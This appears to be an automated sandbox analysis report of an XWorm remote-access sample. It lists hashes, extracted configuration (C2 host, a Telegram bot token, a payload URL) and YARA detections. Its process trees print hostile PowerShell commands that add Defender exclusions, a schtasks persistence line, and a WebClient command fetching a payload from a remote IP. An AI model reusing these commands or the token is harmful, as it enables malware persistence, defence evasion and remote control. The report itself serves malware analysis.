Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
11/05/2024, 01:10
Behavioral task
behavioral1
Sample
287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe
Resource
win10v2004-20240426-en
General
-
Target
287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe
-
Size
199KB
-
MD5
73309cc961f9645c1c2562ffcdc2dab1
-
SHA1
6a8545c08c931e016198c80b304ade1c1e8f7a17
-
SHA256
287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298
-
SHA512
89858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914
-
SSDEEP
3072:Pp/WjbfQnyH5oGpIlkOpXFcdXrOjVbcL/6Z3zPK2Cu:KbYymGpIlHuKoLC9/
Malware Config
Extracted
http://193.222.96.193:81/besho/besho.mp4
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/468-1-0x00000000008F0000-0x0000000000928000-memory.dmp family_xworm behavioral2/files/0x000d000000022b23-60.dat family_xworm -
Detects Windows executables referencing non-Windows User-Agents 2 IoCs
resource yara_rule behavioral2/memory/468-1-0x00000000008F0000-0x0000000000928000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA behavioral2/files/0x000d000000022b23-60.dat INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects executables using Telegram Chat Bot 2 IoCs
resource yara_rule behavioral2/memory/468-1-0x00000000008F0000-0x0000000000928000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot behavioral2/files/0x000d000000022b23-60.dat INDICATOR_SUSPICIOUS_EXE_TelegramChatBot -
Blocklisted process makes network request 1 IoCs
flow pid Process 66 3012 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3456 powershell.exe 516 powershell.exe 788 powershell.exe 3552 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.lnk 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\taskmgr.lnk 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe -
Executes dropped EXE 2 IoCs
pid Process 1160 taskmgr.exe 1444 taskmgr.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskmgr = "C:\\ProgramData\\taskmgr.exe" 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4636 schtasks.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3456 powershell.exe 3456 powershell.exe 516 powershell.exe 516 powershell.exe 788 powershell.exe 788 powershell.exe 3552 powershell.exe 3552 powershell.exe 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 3012 powershell.exe 3012 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeDebugPrivilege 788 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe Token: SeDebugPrivilege 1160 taskmgr.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 1444 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 468 wrote to memory of 3456 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 91 PID 468 wrote to memory of 3456 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 91 PID 468 wrote to memory of 516 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 94 PID 468 wrote to memory of 516 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 94 PID 468 wrote to memory of 788 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 96 PID 468 wrote to memory of 788 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 96 PID 468 wrote to memory of 3552 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 98 PID 468 wrote to memory of 3552 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 98 PID 468 wrote to memory of 4636 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 100 PID 468 wrote to memory of 4636 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 100 PID 468 wrote to memory of 3960 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 108 PID 468 wrote to memory of 3960 468 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe 108 PID 3960 wrote to memory of 3012 3960 WScript.exe 109 PID 3960 wrote to memory of 3012 3960 WScript.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe"C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"2⤵
- Creates scheduled task(s)
PID:4636
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1444
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
733B
MD568c8c79d84f5e3f10dd9328272b0ac55
SHA15ab9a13ec0d01fc1ed71c27a1a23a61019cb8946
SHA25629841f038da6a26dac5df28f23b4adcb080f5b0a2312bf996c8073940849eef6
SHA512d86bd0ac3bd58ee9a1b06e1edba3c03788136292d81bd9cf025525c3a0e40bba9a7b6d5859833a9d470d29ab31b35d5515855a78691bfe54477631d9a0733f6a
-
Filesize
199KB
MD573309cc961f9645c1c2562ffcdc2dab1
SHA16a8545c08c931e016198c80b304ade1c1e8f7a17
SHA256287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298
SHA51289858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914
-
Filesize
2KB
MD5a43e653ffb5ab07940f4bdd9cc8fade4
SHA1af43d04e3427f111b22dc891c5c7ee8a10ac4123
SHA256c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe
SHA51262a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD5eeb3765a0b785f234084876821b1e55f
SHA16312e19d05292ef7b9c6127f26f1763645be6f2b
SHA2562f3ef2bab47b2fb619171ccb5e41c4227093b0e572e4331ee18eecefa97c18e8
SHA51285d516c29afb12e801a6b717c4b809eb8b0cb22dd286d569bb60ee6cf6f0670857e23566addc03a65eb7d9ec88b1805db7a787323863039d28019e426e2e6a7b
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
Filesize
944B
MD5cae60f0ddddac635da71bba775a2c5b4
SHA1386f1a036af61345a7d303d45f5230e2df817477
SHA256b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA51228ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253
-
Filesize
944B
MD5da185fddf7e751e39023edde12930f37
SHA1657fcb7fda401b69d3bb97e7b6abf126ac36d4b2
SHA2568928226805a92acd76d21e1a276176d9af3ca1ec31f14e45a2b4b88f4722cad5
SHA512db7bc02a1bd86d587840a56334dee9cb80aa0a8635cd2eb1c490bc5466659350de4d625f320731e34fac235016515d0dddc05a6081149dc6c2e82c262be6b975
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82